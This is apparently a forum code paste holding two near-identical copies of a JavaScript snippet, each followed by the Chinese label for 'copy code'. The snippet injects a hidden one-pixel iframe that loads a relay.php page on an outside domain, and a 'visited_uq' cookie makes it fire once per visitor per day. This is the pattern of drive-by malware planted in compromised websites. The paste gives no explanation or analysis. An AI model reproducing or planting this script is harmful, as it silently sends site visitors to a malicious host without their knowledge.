- function zzzfff(){
- var osqgt = document.createElement('iframe');
- osqgt.src = 'http://hauser-consulting.com/relay.php';
- osqgt.style.position = 'absolute';
- osqgt.style.border = '0';
- osqgt.style.height = '1px';
- osqgt.style.width = '1px';
- osqgt.style.left = '1px';
- osqgt.style.top = '1px';
- if (!document.getElementById('osqgt')){
- document.write('<div id=\'osqgt\'></div>');
- document.getElementById('osqgt').appendChild(osqgt);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码- function zzzfff(){
- var qgqpc = document.createElement('iframe');
- qgqpc.src = 'http://hauser-consulting.com/relay.php';
- qgqpc.style.position = 'absolute';
- qgqpc.style.border = '0';
- qgqpc.style.height = '1px';
- qgqpc.style.width = '1px';
- qgqpc.style.left = '1px';
- qgqpc.style.top = '1px';
- if (!document.getElementById('qgqpc')){
- document.write('<div id=\'qgqpc\'></div>');
- document.getElementById('qgqpc').appendChild(qgqpc);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码 |